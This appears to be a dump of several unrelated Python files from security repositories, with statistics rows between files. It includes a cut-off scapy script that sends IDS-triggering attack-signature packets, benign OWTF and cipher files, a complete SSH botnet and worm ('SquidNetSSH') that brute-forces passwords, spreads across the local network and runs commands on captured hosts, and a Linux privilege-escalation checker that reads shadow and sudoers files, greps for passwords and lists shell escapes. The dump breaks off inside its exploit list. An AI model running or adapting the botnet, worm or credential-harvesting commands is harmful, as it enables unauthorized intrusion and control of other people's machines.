pkt = IP(src=src,dst=dst)/ICMP(type=0)/Raw(load='AAAAAAAAAA')
send(pkt, iface=iface, count=count)
pkt = IP(src=src,dst=dst)/UDP(dport=31335)/Raw(load='PONG')
send(pkt, iface=iface, count=count)
pkt = IP(src=src,dst=dst)/ICMP(type=0,id=456)
send(pkt, iface=iface, count=count)
def exploitTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=518) \
/Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=635) \
/Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
send(pkt, iface=iface, count=count)
def scanTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=7) \
/Raw(load='cybercop')
send(pkt)
pkt = IP(src=src, dst=dst) / UDP(dport=10080) \
/Raw(load='Amanda')
send(pkt, iface=iface, count=count)
def main():
parser = optparse.OptionParser('usage %prog '+\
'-i <iface> -s <src> -t <target> -c <count>'
)
parser.add_option('-i', dest='iface', type='string',\
help='specify network interface')
parser.add_option('-s', dest='src', type='string',\
help='specify source address')
parser.add_option('-t', dest='tgt', type='string',\
help='specify target address')
parser.add_option('-c', dest='count', type='int',\
help='specify packet count')
(options, args) = parser.parse_args()
    if options.iface is None:
iface = 'eth0'
else:
iface = options.iface
    if options.src is None:
src = '.'.join([str(randint(1,254)) for x in range(4)])
else:
src = options.src
    if options.tgt is None:
print parser.usage
exit(0)
else:
dst = options.tgt
    if options.count is None:
count = 1
else:
count = options.count
ddosTest(src, dst, iface, count)
exploitTest(src, dst, iface, count)
scanTest(src, dst, iface, count)
if __name__ == '__main__':
main()
| 27.135802 | 65 | 0.588235 |
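A typical run of the script above, assuming it is saved as idsTest.py (interface and addresses are illustrative):

python idsTest.py -i eth0 -s 10.0.0.5 -t 10.0.0.9 -c 2

which sends each crafted DDoS-, exploit-, and scan-signature packet twice out of eth0.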
owtf | """
owtf.models.error
~~~~~~~~~~~~~~~~~
"""
from owtf.lib.exceptions import InvalidErrorReference
from sqlalchemy import Boolean, Column, Integer, String
from owtf.db.model_base import Model
from owtf.db.session import flush_transaction
class Error(Model):
__tablename__ = "errors"
id = Column(Integer, primary_key=True)
owtf_message = Column(String)
traceback = Column(String, nullable=True)
user_message = Column(String, nullable=True)
reported = Column(Boolean, default=False)
github_issue_url = Column(String, nullable=True)
def __repr__(self):
return "<Error (traceback='{!s}')>".format(self.traceback)
@classmethod
def add_error(cls, session, message, trace):
obj = Error(owtf_message=message, traceback=trace)
session.add(obj)
session.commit()
return obj.to_dict()
@classmethod
def get_error(cls, session, error_id):
error = session.query(Error).get(error_id)
if not error: # If invalid error id, bail out
raise InvalidErrorReference("No error with id {!s}".format(error_id))
return error.to_dict()
@classmethod
def delete_error(cls, session, id):
error = session.query(cls).get(id)
if error:
session.delete(error)
session.commit()
else:
raise InvalidErrorReference("No error with id {!s}".format(id))
def to_dict(self):
obj = dict(self.__dict__)
obj.pop("_sa_instance_state", None)
return obj
@classmethod
def get_all_dict(cls, session):
errors = session.query(Error).all()
result = []
for err in errors:
result.append(err.to_dict())
return result
@classmethod
def update_error(cls, session, error_id, user_message):
        obj = session.query(Error).get(error_id)
        if not obj: # If invalid error id, bail out
raise InvalidErrorReference("No error with id {!s}".format(error_id))
obj.user_message = user_message
session.merge(obj)
session.commit()
| 29.014286 | 81 | 0.619524 |
cybersecurity-penetration-testing | # Transposition Cipher Encrypt/Decrypt File
# http://inventwithpython.com/hacking (BSD Licensed)
import time, os, sys, transpositionEncrypt, transpositionDecrypt
def main():
inputFilename = 'frankenstein.txt'
# BE CAREFUL! If a file with the outputFilename name already exists,
# this program will overwrite that file.
outputFilename = 'frankenstein.encrypted.txt'
myKey = 10
myMode = 'encrypt' # set to 'encrypt' or 'decrypt'
# If the input file does not exist, then the program terminates early.
if not os.path.exists(inputFilename):
print('The file %s does not exist. Quitting...' % (inputFilename))
sys.exit()
# If the output file already exists, give the user a chance to quit.
if os.path.exists(outputFilename):
print('This will overwrite the file %s. (C)ontinue or (Q)uit?' % (outputFilename))
response = input('> ')
if not response.lower().startswith('c'):
sys.exit()
# Read in the message from the input file
fileObj = open(inputFilename)
content = fileObj.read()
fileObj.close()
print('%sing...' % (myMode.title()))
# Measure how long the encryption/decryption takes.
startTime = time.time()
if myMode == 'encrypt':
translated = transpositionEncrypt.encryptMessage(myKey, content)
elif myMode == 'decrypt':
translated = transpositionDecrypt.decryptMessage(myKey, content)
totalTime = round(time.time() - startTime, 2)
print('%sion time: %s seconds' % (myMode.title(), totalTime))
# Write out the translated message to the output file.
outputFileObj = open(outputFilename, 'w')
outputFileObj.write(translated)
outputFileObj.close()
print('Done %sing %s (%s characters).' % (myMode, inputFilename, len(content)))
print('%sed file is %s.' % (myMode.title(), outputFilename))
# If transpositionCipherFile.py is run (instead of imported as a module)
# call the main() function.
if __name__ == '__main__':
main() | 37.166667 | 91 | 0.653398 |
Ethical-Hacking-Scripts | import paramiko, socket, threading, sys, os
from optparse import OptionParser
class SSH_Botnet:
def __init__(self, passw_txt, capture_output):
self.pass_list = passw_txt
self.cwd = os.getcwd()
self.passwords = self.configure_passwords()
self.ssh_bots = []
self.ips = []
self.logo()
self.usage()
self.display_bots = []
try:
self.capture_output = bool(capture_output)
except:
self.capture_output = False
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.instructor = threading.Thread(target=self.instruct)
self.instructor.start()
self.ssh_botlist = []
def logo(self):
print("""
_____ _ _ _ _ _ _____ _____ _ _ ___ ___
/ ____| (_) | | \ | | | | / ____/ ____| | | | |__ \ / _ \
| (___ __ _ _ _ _ __| | \| | ___| |_| (___| (___ | |__| | __ __ ) || | | |
\___ \ / _` | | | | |/ _` | . ` |/ _ \ __|\___ \___ \| __ | \ \ / // / | | | |
____) | (_| | |_| | | (_| | |\ | __/ |_ ____) |___) | | | | \ V // /_ | |_| |
|_____/ \__, |\__,_|_|\__,_|_| \_|\___|\__|_____/_____/|_| |_| \_/|____(_)___/
| |
|_|
SSH-Botnet By DrSquid """)
def usage(self):
print("""
[+] !help - Displays All Commands
[+] !login [ip] [user] [pass] - Attempts to Log into the ip with the user with the provided password.
[+] !infect [ip] [username] - Attempts to break into the hostname with the ip provided.
[+] !inject [filename] - Opens SFTP and uploads a file to the bots.
[+] !networkinfect [cfg] - Attempts to infect all the devices on the network(optional cfg file)
[+] !clear - Clears all of the output of this script.
[+] Any other commands will be sent to the bots as cmd commands.
""")
def configure_passwords(self):
file = open(self.pass_list,'r')
passwords = file.readlines()
return passwords
def infect(self, ip, username):
error_count = 0
print(f"[+] Brute Forcing the Password for: {username}@{ip}")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
flag = 0
for password in self.passwords:
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
passw = password.strip()
client.connect(ip, 22, username, passw, timeout=2, auth_timeout=2)
print(f"\n[!] {ip}'s Password has been found!: {passw}")
print(f"[!] Adding {username}@{ip} to the botnet.\n")
self.ips.append(ip)
self.display_bots.append(f"{username}@{ip}")
self.ssh_bots.append(client)
self.ssh_botlist.append(str(client)+' '+str(username))
flag = 1
break
except Exception as e:
client.close()
if flag == 0:
print(f"[?] Unable to Brute Force password for {username}@{ip}")
def inject(self, client, file):
if "/" in file or "\\" in file:
result = ""
for letter in file:
if letter == "/" or letter == "\\":
result += " "
else:
result += letter
split_result = result.split()
file = split_result[(len(split_result)-1)]
file_dir = ""
for item in split_result:
if item == file:
pass
else:
file_dir = file_dir + item + "/"
os.chdir(file_dir)
for usernames in self.ssh_botlist:
if str(client) in usernames:
split_item = usernames.split()
username = split_item[4]
try:
sftp = client.open_sftp()
sftp.put(file, f'C:/{username}/{file}')
except:
sftp = client.open_sftp()
sftp.put(file, f'/Users/{username}/{file}')
os.chdir(self.cwd)
def send_instruction(self, instruction):
for bot in self.ssh_bots:
try:
if self.capture_output:
for usernames in self.ssh_botlist:
if str(bot) in usernames:
split_item = usernames.split()
username = split_item[4]
stdin, stdout, stderr = bot.exec_command(instruction, get_pty=True)
stdin.close()
output = stdout.read().decode()
if output.strip() == "":
pass
else:
print(f"\n[({username})]: {output.strip()}")
else:
bot.exec_command(instruction)
except:
pass
def reg_login(self, ip, username, password):
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print(f"[+] Attempting to login to {username}@{ip} with: {password}")
client.connect(ip, 22, username, password)
print(f"\n[!] Access Granted!")
print(f"[!] Adding {username}@{ip} to the Botnet.\n")
self.ssh_bots.append(client)
self.ssh_botlist.append(str(client) + ' ' + str(username))
self.display_bots.append(f"{username}@{ip}")
except Exception as e:
print("[+] Authentication Failed. Try to check your inputs.")
def network_infect(self, config_file=None):
if config_file != None:
Replicator = Worm(self.pass_list, config_file)
else:
Replicator = Worm(self.pass_list)
def instruct(self):
while True:
try:
self.instruction = input("[+] Enter your instruction: ")
if self.instruction.startswith("!infect"):
msg_split = self.instruction.split()
targ_ip = msg_split[1]
user = msg_split[2]
infector = threading.Thread(target=self.infect, args=(targ_ip, user))
infector.start()
elif self.instruction.startswith("!inject"):
msg_split = self.instruction.split()
filename = msg_split[1]
for bot in self.ssh_bots:
injector = threading.Thread(target=self.inject, args=(bot, filename))
injector.start()
elif self.instruction.startswith("!listbots"):
print(f"[+] List of Bots: {self.display_bots}")
elif self.instruction.startswith("!networkinfect"):
msg_split = self.instruction.split()
try:
cfg_file = msg_split[1]
network_infector = threading.Thread(target=self.network_infect, args=(cfg_file,))
network_infector.start()
except:
network_infector = threading.Thread(target=self.network_infect)
network_infector.start()
elif self.instruction.startswith("!clear"):
if sys.platform == "win32":
os.system('cls')
else:
os.system('clear')
self.logo()
self.usage()
elif self.instruction.startswith("!login"):
msg_split = self.instruction.split()
ip = msg_split[1]
username = msg_split[2]
password = msg_split[3]
self.reg_login(ip,username,password)
elif self.instruction.startswith("!help"):
self.usage()
else:
sender = threading.Thread(target=self.send_instruction, args=(self.instruction,))
sender.start()
except:
pass
class Worm:
def __init__(self, passw_file,cfg_file=None):
self.cfg_file = cfg_file
self.has_cfg = False
if self.cfg_file != None:
self.cfg_contents, self.ls_contents = self.cfg(self.cfg_file)
self.os_ls = ['windows','apple','linux']
self.ips = os.popen('arp -a').readlines()
self.possiblevictims = self.identify_victims()
self.passwords_cracked = 0
self.passwords_scanned = 0
self.passw_file = passw_file
self.victims = []
self.ips_scanned = 0
print(f"\n[+] List of Possible Hosts: {self.possiblevictims}")
print("[+] Initiating Port Scan.....")
self.passwords = self.obtain_passw()
self.port_scanner = threading.Thread(target=self.begin_port_scan)
self.port_scanner.start()
def cfg(self, filename):
file = open(filename, "r")
contents = file.read()
file.close()
file = open(filename, "r")
ls_contents = file.readlines()
file.close()
if "CFGFORWORM" in contents:
self.has_cfg = True
print("[+] A Config file has been provided.")
return contents, ls_contents
        else:
            return None, None
def initiate_threads(self):
self.laster = threading.Thread(target=self.output_item)
self.laster.start()
while True:
try:
if self.ips_scanned == len(self.possiblevictims):
if len(self.victims) == 0:
print("\n[+] No Hosts with Port 22 Open.")
else:
for ip in self.victims:
if self.has_cfg:
if ip in self.cfg_contents:
if ip not in self.victims:
print(f"[+] {ip} is in config file, but not in victim list.\n[+] Ignoring.........")
else:
for line in self.ls_contents:
if ip in line:
try:
ipcfg = line.split()
try:
username = ipcfg[1]
except:
username = "root"
except:
pass
else:
username = "root"
else:
username = "root"
victim = threading.Thread(target=self.victimlogin, args=(ip, username))
victim.start()
break
except:
pass
def begin_port_scan(self):
for ip in self.possiblevictims:
try:
print(f"\n[+] Scanning {ip}.....")
portscanner = threading.Thread(target=self.port_scan, args=(ip,))
portscanner.start()
except:
pass
self.initiate_threads()
def port_scan(self, ip):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 22))
self.victims.append(ip)
print(f"\n[!] {ip} has 22 as an open Port.")
except:
print(f"\n[+] {ip} does not have 22 as an open port.")
s.close()
self.ips_scanned += 1
def obtain_passw(self):
with open(self.passw_file, "r") as file:
passwords = file.readlines()
return passwords
def identify_victims(self):
victims = []
if sys.platform == "win32":
for lines in self.ips:
try:
line = lines.split()
ip = line[0]
checker = int(ip[0])
victims.append(ip)
except:
pass
elif sys.platform == "darwin":
for lines in self.ips:
try:
line = lines.split()
ip = line[1]
ip = ip.strip('()')
checker = int(ip[0])
victims.append(ip)
except:
pass
return victims
def output_item(self):
while True:
try:
if self.passwords_scanned == len(self.victims):
break
except:
pass
def victimlogin(self, ip, username="root"):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print(f"[+] Attempting to Brute Force Password for IP: {ip}")
flag = 0
for password in self.passwords:
try:
password = password.strip()
client.connect(ip, 22, username, password)
flag = 1
break
except:
pass
if flag == 1:
self.passwords_scanned += 1
print(f"\n[!] {ip}'s Password has been Cracked!: {password}")
print(f"[!] Adding {username}@{ip} to the Botnet.\n")
Botnet.ssh_bots.append(client)
Botnet.ssh_botlist.append(str(client) + ' ' + str(username))
Botnet.display_bots.append(f"{username}@{ip}")
else:
print(f"\n[?] {ip}'s Password was unable to be cracked.")
self.passwords_scanned += 1
class OptionParse:
def __init__(self):
if len(sys.argv) < 2:
self.usage()
else:
self.get_args()
def usage(self):
SSH_Botnet.logo(None)
print("""
[+] Option-Parsing Help:
[+] --pL, --passlist - Specifies the Brute Forcing TxT File.
[+] --cO, --captopt - Specify whether to capture bot output or not.
[+] --i, --info - Shows this message.
[+] Usage:""")
if sys.argv[0].endswith(".py"):
print("[+] python3 SquidNetSSH.py --pL <passlist> --cO <bool>")
print("[+] python3 SquidNetSSH.py --i")
else:
print("[+] SquidNetSSH --pL <passlist> --cO <bool>")
print("[+] SquidNetSSH --i")
def get_args(self):
self.opts = OptionParser()
self.opts.add_option("--pL","--passlist",dest="passlist")
self.opts.add_option("--cO", "--captopt", dest="captopt", action="store_true")
self.opts.add_option("--i","--info",dest="info",action="store_true")
args, opt = self.opts.parse_args()
if args.passlist is None:
self.usage()
else:
passlist = args.passlist
if args.captopt is None:
captopt = False
else:
captopt = True
Botnet = SSH_Botnet(passlist, captopt)
optionparser = OptionParse() | 43.387187 | 173 | 0.443517 |
Advanced-Infrastructure-Penetration-Testing | #!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates,
## I did not write it to be efficient and in some cases you may find the functions may not produce the desired
## results. For example, the function that links packages to running processes is based on keywords and will
## not always be accurate. Also, the exploit list included in this function will need to be updated over time.
## Feel free to change or improve it any way you see fit.
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
###############################################################################################################
# conditional import for older versions of python not compatible with subprocess
try:
import subprocess as sub
compatmode = 0 # newer version of python, no need for compatibility mode
except ImportError:
import os # older version of python, need to use os instead
compatmode = 1
# title / formatting
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
print bigline
print "LINUX PRIVILEGE ESCALATION CHECKER"
print bigline
print
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
results = out.split('\n')
else: # older version of python, use os.popen
echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
msg = cmdDict[item]["msg"]
results = cmdDict[item]["results"]
print "[+] " + msg
for result in results:
if result.strip() != "":
print " " + result.strip()
print
return
def writeResults(msg, results):
f = open("privcheckout.txt", "a");
f.write("[+] " + str(len(results)-1) + " " + msg)
for result in results:
if result.strip() != "":
f.write(" " + result.strip())
f.close()
return
# Basic system info
print "[*] GETTING BASIC SYSTEM INFO...\n"
results=[]
sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
"KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
"HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
}
sysInfo = execCmd(sysInfo)
printResults(sysInfo)
# Networking Info
print "[*] GETTING NETWORKING INFO...\n"
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
"NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
}
netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
print "[*] GETTING FILESYSTEM INFO...\n"
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
}
driveInfo = execCmd(driveInfo)
printResults(driveInfo)
# Scheduled Cron Jobs
cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
"CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
}
cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
"ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
"SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
"HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
"ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
"SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
"LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
}
userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}
fdPerms = execCmd(fdPerms)
printResults(fdPerms)
pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
"CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
"SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
}
pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
else:
getPkgs = "rpm -qa | sort -u" # RH/other
getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
"PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
}
getAppProc = execCmd(getAppProc)
printResults(getAppProc) # comment to reduce output
otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
"APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
"APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
}
otherApps = execCmd(otherApps)
printResults(otherApps)
print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
# find the package information for the processes currently running
# under root or another super user
procs = getAppProc["PROCS"]["results"]
pkgs = getAppProc["PKGS"]["results"]
supusers = userInfo["SUPUSERS"]["results"]
procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
for user in supusers: # loop through the known super users
if (user != "") and (user in proc): # if the process is being run by a super user
procname = proc.split(" ")[4] # grab the process name
if "/" in procname:
splitname = procname.split("/")
procname = splitname[len(splitname)-1]
for pkg in pkgs: # loop through the packages
if not len(procname) < 3: # name too short to get reliable package results
if procname in pkg:
if procname in procdict:
relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
if pkg not in relatedpkgs:
relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
pass
for key in procdict:
print " " + key # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
print " Possible Related Packages: "
for entry in procdict[key]:
print " " + entry # print each related package
except:
pass
# EXPLOIT ENUMERATION
# First discover the available tools
print
print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
print "[+] Related Shell Escape Sequences...\n"
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
for result in devTools["TOOLS"]["results"]:
if cmd in result:
for item in escapeCmd[cmd]:
print " " + cmd + "-->\t" + item
print
print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}},
"<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}},
"2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}},
"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
